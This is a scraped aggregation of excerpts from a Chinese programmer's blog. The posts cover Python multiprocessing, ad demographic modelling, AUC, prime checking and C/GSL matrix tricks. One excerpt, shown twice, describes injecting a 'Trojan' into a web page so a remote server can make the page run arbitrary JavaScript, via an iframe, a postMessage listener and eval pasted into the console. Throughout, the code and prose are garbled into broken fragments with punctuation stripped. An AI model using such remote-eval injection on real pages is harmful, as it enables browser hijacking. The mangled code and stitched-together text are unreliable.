todwang.blogspot.com
王元涛的Blog: 四月 2012
http://todwang.blogspot.com/2012_04_01_archive.html
有一天,QA要我写一个程序,处理一个很大的文本文件,通常几百MB,有时几个G。 这个本文本件是一些顺序打印的JSON,需要解析出来,然后按照他们喜欢的格式重新打印。 先写了一个单线程版本,发现很慢,CPU 100%。估计是parse json太慢了。 For line in sys.stdin:. If line[0] = }:. Def handle(buf, m):. O = json.loads(buf). 记得python的多线程是伪多线程,在多核的机器上CPU还是100%。于是直接采用多进程。 Buf queue = multiprocessing.Queue(). For buf in iter(q.get, None):. For i in xrange(23):. Multiprocessing.Process(target=process, args=(buf queue) .start(). For line in sys.stdin:. If line[0] = }:. Iter(q.get, None). Pool = multiprocessing.Pool(). Print ...
todwang.blogspot.com
王元涛的Blog: Demographic prediction over aggregated data set
http://todwang.blogspot.com/2013/06/demographic-prediction-over-aggregated.html
Demographic prediction over aggregated data set. Sometimes you may have no explicit demographic data you desired, P(D C), where C is the content (page/video/game or whatever you offer) the visitor is consuming and D is the visitor demographic bucket, but you can get some aggregated report from third party, in this schema: P(A,D), here A is the advertisement. For a fixed demographic bucket, D, we have a linear equation:. P(A D)=SUM{P(A C)*P(C D), foreach C}. Audience has some demographic property and as a...
todwang.blogspot.com
王元涛的Blog: 九月 2012
http://todwang.blogspot.com/2012_09_01_archive.html
My Adventure to "Wacity". 人上了岁数就爱怀旧。周末一个人在家无聊,整理资料,翻出来一篇2005年的英语写作课的作业。发现自己年轻的时候想象力真犀利啊。 My Adventure to Wacity. I would like to tell you about my adventure to a wacity last Friday, which was very exciting. I am a farmer in 31 century, and now the scientists can enable people to breathe and live in the water as in the air. So years ago, my family emigrate to a village down the sea, earning lives by growing coral. Hey, where are you from, freshman? But where are the wacars? I asked an old woman in the str...
todwang.blogspot.com
王元涛的Blog: 四月 2013
http://todwang.blogspot.com/2013_04_01_archive.html
Use window.postMessage to hack a page. Just wondering to if I can ingest a Trojan into a page, and my server can control the client to run any javascript. Here I get a solution: https:/ developer.mozilla.org/en-US/docs/DOM/window.postMessage. Type F12 in Chrome and paste the following js code in Console:. Body = document.getElementsByTagName(. Iframe = document.createElement(. Iframe.src = . 160; eval(. ReceiveMessage, . 160; iframe.contentWindow.postMessage(. 160; . Date() .toString() ;. The ma...
todwang.blogspot.com
王元涛的Blog: use window.postMessage to hack a page
http://todwang.blogspot.com/2013/04/use-windowpostmessage-to-hack-page.html
Use window.postMessage to hack a page. Just wondering to if I can ingest a Trojan into a page, and my server can control the client to run any javascript. Here I get a solution: https:/ developer.mozilla.org/en-US/docs/DOM/window.postMessage. Type F12 in Chrome and paste the following js code in Console:. Body = document.getElementsByTagName(. Iframe = document.createElement(. Iframe.src = . 160; eval(. ReceiveMessage, . 160; iframe.contentWindow.postMessage(. 160; . Date() .toString() ;. The ma...
todwang.blogspot.com
王元涛的Blog: 三月 2012
http://todwang.blogspot.com/2012_03_01_archive.html
昨天午饭后又是没人愿意去刷碗。于是老婆说:"这次换个方法掷骰子吧。如果我连掷三次都没掷到刷碗,你就去刷,否则我去"。我说好。 我算了一下,说,不行,要4次。 然后。。。我就去刷碗了。 一天同事考我一个C 的问题,关于STL容器的拷贝构造。 Std: vector int v ;. Av push back(9);. Printf(%d %d %d %d n, a.v .size(), b.v .size(), a.v [0], b.v [0]);. Av [0] = 8;. Printf(%d %d %d %d n, a.v .size(), b.v .size(), a.v [0], b.v [0]);. Https:/ www.kddcup2012.org/c/kddcup2012-track2/. 广告的静态属性,引用 purchasedkeyword tokensid.txt. 8203;花了一晚上下载了2G的数据文件,解压缩后 11G. 0 1 9279176529507935999 10810874 23649 1 1 1647439 373861 816959 727055 766180.
todwang.blogspot.com
王元涛的Blog: 六月 2012
http://todwang.blogspot.com/2012_06_01_archive.html
如果你希望所有操作在栈上进行,可以考虑这样,利用C的原生二维数组的内存布局和gsl matrix对内存布局的假设一致:每一行的内容连续存储。 Include gsl/gsl matrix.h. Define init matrix(src, dst). Gsl matrix dst;. Dstsize1 = sizeof(src) / sizeof(src[0]);. Dsttda = dst.size2 = sizeof(src[0]) / sizeof(src[0][0]);. Dstdata = (double*)(void*)src;. Dstblock = NULL; dst.owner = false;. For(int i=0;i 3; i)for(int j=0;j 4; j)x[i][j]=1 i 0.1*(1 j);. Init matrix(x, a);. Gsl matrix scale(&a, 100);. Gsl matrix fprintf(stdout, &a, %g);. 一天我一同事向我推荐了一本书,讲C 对象模型的。 Struct B{ char c;};.
todwang.blogspot.com
王元涛的Blog: Fwd: An interesting property of AUC
http://todwang.blogspot.com/2013/12/fwd-interesting-property-of-auc.html
Fwd: An interesting property of AUC. Get definition of AUC here. Http:/ en.wikipedia.org/wiki/Receiver operating characteristic. Property: if you flip ground truth only, or flip prediction only, you will get 1-original AUC as new AUC. Take original ROC curve as function of moving score threshold (x(s),y(s) =(fp(s)/N, tp(s)/P). Where fp(s) is false positive=number of cases predicted as positive under score threshold s but actually negative. N is number of negative cases and P is number of positive cases.
todwang.blogspot.com
王元涛的Blog: Prime Checker With Cache
http://todwang.blogspot.com/2013/06/prime-checker-with-cache.html
Prime Checker With Cache. Def isPrim(self, test):. If test =self.maxTested:. Return test in self.primeSet. Test and update cache. For i in range(self.maxTested 1,test 1):. If not any([i%p= 0 for p in self.primeSet]):. Return test in self.primeSet. 初始:手动设置,成立。 保持:注意到,每次加入primeSet的,总是不能被任何已知素数整除的最小的自然数,也就是primeSet之外最小的素数。因此不变量保持。 关于素数密度(不超过n的素数个数/n),我最近学习到有一些有意思的事实. 3、素数的密度比平方数大:)呵呵没想到吧. Http:/ en.wikipedia.org/wiki/Prime number theorem. 订阅: 帖子评论 (Atom). Prime Checker With Cache. Simple模板. 由 Blogger.